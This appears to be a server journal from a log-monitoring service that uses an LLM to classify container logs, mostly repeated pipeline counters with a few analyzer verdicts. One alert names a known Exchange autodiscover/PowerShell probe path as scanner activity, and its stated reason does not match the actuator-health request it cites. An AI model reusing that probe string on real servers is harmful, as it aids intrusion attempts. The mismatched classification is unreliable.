Mar 20 02:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:35:31.942002 [observer] Patterns: hash=865 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=16
Mar 20 02:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:36:01.956112 [observer] Pipeline: processed=883 pattern_hits=867 llm_calls=16 llm_errors=0 learned=0
Mar 20 02:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:36:01.956143 [observer] Patterns: hash=867 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=16
Mar 20 02:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:36:31.933581 [observer] Pipeline: processed=887 pattern_hits=871 llm_calls=16 llm_errors=0 learned=0
Mar 20 02:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:36:31.933603 [observer] Patterns: hash=871 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=16
Mar 20 02:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:37:01.950598 [observer] Pipeline: processed=889 pattern_hits=873 llm_calls=16 llm_errors=0 learned=0
Mar 20 02:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:37:01.950627 [observer] Patterns: hash=873 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=16
Mar 20 02:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:37:31.934608 [observer] Pipeline: processed=893 pattern_hits=877 llm_calls=16 llm_errors=0 learned=0
Mar 20 02:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:37:31.934639 [observer] Patterns: hash=877 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=16
Mar 20 02:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:38:01.963308 [observer] Pipeline: processed=895 pattern_hits=879 llm_calls=16 llm_errors=0 learned=0
Mar 20 02:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:38:01.963337 [observer] Patterns: hash=879 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=16
Mar 20 02:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:38:31.935286 [observer] Pipeline: processed=899 pattern_hits=883 llm_calls=16 llm_errors=0 learned=0
Mar 20 02:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:38:31.935309 [observer] Patterns: hash=883 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=16
Mar 20 02:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:39:01.959202 [observer] Pipeline: processed=901 pattern_hits=885 llm_calls=16 llm_errors=0 learned=0
Mar 20 02:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:39:01.959316 [observer] Patterns: hash=885 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=16
Mar 20 02:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:39:31.944594 [observer] Pipeline: processed=903 pattern_hits=887 llm_calls=16 llm_errors=0 learned=0
Mar 20 02:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:39:31.944623 [observer] Patterns: hash=887 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=16
Mar 20 02:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:40:01.941078 [observer] Pipeline: processed=907 pattern_hits=891 llm_calls=16 llm_errors=0 learned=0
Mar 20 02:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:40:01.941112 [observer] Patterns: hash=891 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=16
Mar 20 02:40:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:40:25.993587 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 02:40:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:40:25.993627 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 02:40:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:40:30.654710 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 02:40:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:40:30.654747 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+)
Mar 20 02:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:40:31.936080 [observer] Pipeline: processed=913 pattern_hits=895 llm_calls=18 llm_errors=0 learned=0
Mar 20 02:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:40:31.936108 [observer] Patterns: hash=895 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=18
Mar 20 02:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:41:01.943423 [observer] Pipeline: processed=917 pattern_hits=899 llm_calls=18 llm_errors=0 learned=0
Mar 20 02:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:41:01.943452 [observer] Patterns: hash=899 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=18
Mar 20 02:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:41:31.935120 [observer] Pipeline: processed=919 pattern_hits=901 llm_calls=18 llm_errors=0 learned=0
Mar 20 02:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:41:31.935149 [observer] Patterns: hash=901 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=18
Mar 20 02:42:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:42:02.162476 [observer] Pipeline: processed=923 pattern_hits=905 llm_calls=18 llm_errors=0 learned=0
Mar 20 02:42:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:42:02.162522 [observer] Patterns: hash=905 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=18
Mar 20 02:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:42:31.941660 [observer] Pipeline: processed=925 pattern_hits=907 llm_calls=18 llm_errors=0 learned=0
Mar 20 02:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:42:31.941687 [observer] Patterns: hash=907 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=18
Mar 20 02:42:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:42:37.892709 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 02:42:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:42:37.892748 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+)
Mar 20 02:42:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:42:41.386260 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 02:42:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:42:41.386304 [analyzer] Source hint mismatch: LLM says "docker", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 02:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:43:01.962784 [observer] Pipeline: processed=933 pattern_hits=913 llm_calls=20 llm_errors=0 learned=0
Mar 20 02:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:43:01.962813 [observer] Patterns: hash=913 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=20
Mar 20 02:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:43:31.933773 [observer] Pipeline: processed=939 pattern_hits=919 llm_calls=20 llm_errors=0 learned=0
Mar 20 02:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:43:31.933794 [observer] Patterns: hash=919 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=20
Mar 20 02:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:44:01.958719 [observer] Pipeline: processed=941 pattern_hits=921 llm_calls=20 llm_errors=0 learned=0
Mar 20 02:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:44:01.958757 [observer] Patterns: hash=921 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=20
Mar 20 02:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:44:31.934902 [observer] Pipeline: processed=945 pattern_hits=925 llm_calls=20 llm_errors=0 learned=0
Mar 20 02:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:44:31.934930 [observer] Patterns: hash=925 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=20
Mar 20 02:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:45:01.943866 [observer] Pipeline: processed=947 pattern_hits=927 llm_calls=20 llm_errors=0 learned=0
Mar 20 02:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:45:01.943893 [observer] Patterns: hash=927 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=20
Mar 20 02:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:45:31.934500 [observer] Pipeline: processed=953 pattern_hits=933 llm_calls=20 llm_errors=0 learned=0
Mar 20 02:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:45:31.934529 [observer] Patterns: hash=933 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=20
Mar 20 02:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:46:01.954291 [observer] Pipeline: processed=955 pattern_hits=935 llm_calls=20 llm_errors=0 learned=0
Mar 20 02:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:46:01.954871 [observer] Patterns: hash=935 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=20
Mar 20 02:46:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:46:26.101356 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 02:46:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:46:26.101395 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An actuator health endpoint missing its file under nginx, resulting in a failed health check. This is an abnormal health endpoint failure and could indicate misconfiguration or deployment issues, warranting monitoring but not definitive malicious activity. Line=2026-03-20T02:46:21.612730653Z 2026/03/20 02:46:21 [error] 422#422: *744141 open() "/usr/share/nginx/default/actuator/health" failed (2: No such file or directory), client: 20.118.233.215, server: _, ...
Mar 20 02:46:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:46:26.101462 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation).
Line=2026-03-20T02:46:21.612753343Z 20.118.233.215 - - [20/Mar/2026:02:46:21 +0000] "54.200.221.0" "GET /actuator/health HTTP/1.1" 404 2401 "-" "Mozilla/5.0 zgrab/0.x" "-" Mar 20 02:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:46:31.939258 [observer] Pipeline: processed=959 pattern_hits=938 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:46:31.939289 [observer] Patterns: hash=938 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:47:01.945998 [observer] Pipeline: processed=963 pattern_hits=942 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:47:01.946024 [observer] Patterns: hash=942 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:47:31.937329 [observer] Pipeline: processed=965 pattern_hits=944 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:47:31.937353 [observer] Patterns: hash=944 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:48:01.954660 [observer] Pipeline: processed=969 pattern_hits=948 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:48:01.954715 [observer] Patterns: hash=948 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:48:31.943182 [observer] Pipeline: processed=971 pattern_hits=950 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:48:31.943210 [observer] Patterns: hash=950 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:49:01.943553 [observer] Pipeline: processed=975 
pattern_hits=954 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:49:01.943692 [observer] Patterns: hash=954 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:49:31.942197 [observer] Pipeline: processed=977 pattern_hits=956 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:49:31.942221 [observer] Patterns: hash=956 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:50:01.959148 [observer] Pipeline: processed=979 pattern_hits=958 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:50:01.959209 [observer] Patterns: hash=958 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:50:31.934189 [observer] Pipeline: processed=985 pattern_hits=964 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:50:31.934215 [observer] Patterns: hash=964 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:51:01.953585 [observer] Pipeline: processed=987 pattern_hits=966 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:51:01.953610 [observer] Patterns: hash=966 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:51:31.934862 [observer] Pipeline: processed=991 pattern_hits=970 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:51:31.934890 [observer] Patterns: hash=970 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 
02:52:01.949936 [observer] Pipeline: processed=993 pattern_hits=972 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:52:01.950045 [observer] Patterns: hash=972 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:52:31.934818 [observer] Pipeline: processed=997 pattern_hits=976 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:52:31.934850 [observer] Patterns: hash=976 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:53:01.952687 [observer] Pipeline: processed=999 pattern_hits=978 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:53:01.952796 [observer] Patterns: hash=978 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:53:31.943650 [observer] Pipeline: processed=1001 pattern_hits=980 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:53:31.943678 [observer] Patterns: hash=980 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:54:01.943554 [observer] Pipeline: processed=1005 pattern_hits=984 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:54:01.943584 [observer] Patterns: hash=984 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:54:31.933602 [observer] Pipeline: processed=1007 pattern_hits=986 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:54:31.933625 [observer] Patterns: hash=986 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:55:02 
ip-172-26-12-110 observer[1565011]: 2026/03/20 02:55:02.028884 [observer] Pipeline: processed=1011 pattern_hits=990 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:55:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:55:02.028919 [observer] Patterns: hash=990 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:55:31.933658 [observer] Pipeline: processed=1015 pattern_hits=994 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:55:31.933685 [observer] Patterns: hash=994 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:56:01.948693 [observer] Pipeline: processed=1019 pattern_hits=998 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:56:01.948723 [observer] Patterns: hash=998 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:56:31.934009 [observer] Pipeline: processed=1022 pattern_hits=1001 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:56:31.934033 [observer] Patterns: hash=1001 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:57:01.950822 [observer] Pipeline: processed=1024 pattern_hits=1003 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:57:01.950848 [observer] Patterns: hash=1003 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:57:31.934855 [observer] Pipeline: processed=1028 pattern_hits=1007 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:57:31.934887 [observer] Patterns: hash=1007 prefix=0 regex=0 contains=0 
deny=2 alert=1 suppress=0 misses=21 Mar 20 02:58:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:58:02.040116 [observer] Pipeline: processed=1030 pattern_hits=1009 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:58:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:58:02.040155 [observer] Patterns: hash=1009 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:58:31.934755 [observer] Pipeline: processed=1034 pattern_hits=1013 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:58:31.934780 [observer] Patterns: hash=1013 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:59:01.988274 [observer] Pipeline: processed=1036 pattern_hits=1015 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:59:01.988311 [observer] Patterns: hash=1015 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 02:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:59:31.933628 [observer] Pipeline: processed=1039 pattern_hits=1018 llm_calls=21 llm_errors=0 learned=0 Mar 20 02:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:59:31.933652 [observer] Patterns: hash=1018 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:00:01.943087 [observer] Pipeline: processed=1042 pattern_hits=1021 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:00:01.943114 [observer] Patterns: hash=1021 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:00:31.942515 [observer] Pipeline: processed=1046 pattern_hits=1025 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:00:31.942540 
[observer] Patterns: hash=1025 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:01:01.939464 [observer] Pipeline: processed=1050 pattern_hits=1029 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:01:01.939498 [observer] Patterns: hash=1029 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:01:31.947058 [observer] Pipeline: processed=1052 pattern_hits=1031 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:01:31.947083 [observer] Patterns: hash=1031 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:02:01.942629 [observer] Pipeline: processed=1056 pattern_hits=1035 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:02:01.942869 [observer] Patterns: hash=1035 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:02:31.934671 [observer] Pipeline: processed=1058 pattern_hits=1037 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:02:31.934696 [observer] Patterns: hash=1037 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:03:01.953756 [observer] Pipeline: processed=1061 pattern_hits=1040 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:03:01.953787 [observer] Patterns: hash=1040 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:03:31.938589 [observer] Pipeline: processed=1064 pattern_hits=1043 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:03:31 
ip-172-26-12-110 observer[1565011]: 2026/03/20 03:03:31.938615 [observer] Patterns: hash=1043 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:04:01.952786 [observer] Pipeline: processed=1066 pattern_hits=1045 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:04:01.952817 [observer] Patterns: hash=1045 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:04:31.933787 [observer] Pipeline: processed=1070 pattern_hits=1049 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:04:31.933815 [observer] Patterns: hash=1049 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:05:01.939683 [observer] Pipeline: processed=1072 pattern_hits=1051 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:05:01.939711 [observer] Patterns: hash=1051 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:05:31.933656 [observer] Pipeline: processed=1078 pattern_hits=1057 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:05:31.933679 [observer] Patterns: hash=1057 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:06:01.944152 [observer] Pipeline: processed=1080 pattern_hits=1059 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:06:01.944203 [observer] Patterns: hash=1059 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:06:31.934724 [observer] Pipeline: processed=1083 
pattern_hits=1062 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:06:31.934753 [observer] Patterns: hash=1062 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:07:01.969027 [observer] Pipeline: processed=1086 pattern_hits=1065 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:07:01.969054 [observer] Patterns: hash=1065 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:07:31.949842 [observer] Pipeline: processed=1088 pattern_hits=1067 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:07:31.949872 [observer] Patterns: hash=1067 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:08:01.947215 [observer] Pipeline: processed=1092 pattern_hits=1071 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:08:01.947244 [observer] Patterns: hash=1071 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:08:31.943224 [observer] Pipeline: processed=1094 pattern_hits=1073 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:08:31.943245 [observer] Patterns: hash=1073 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:09:01.940301 [observer] Pipeline: processed=1098 pattern_hits=1077 llm_calls=21 llm_errors=0 learned=0 Mar 20 03:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:09:01.940330 [observer] Patterns: hash=1077 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21 Mar 20 03:09:31 ip-172-26-12-110 observer[1565011]: 
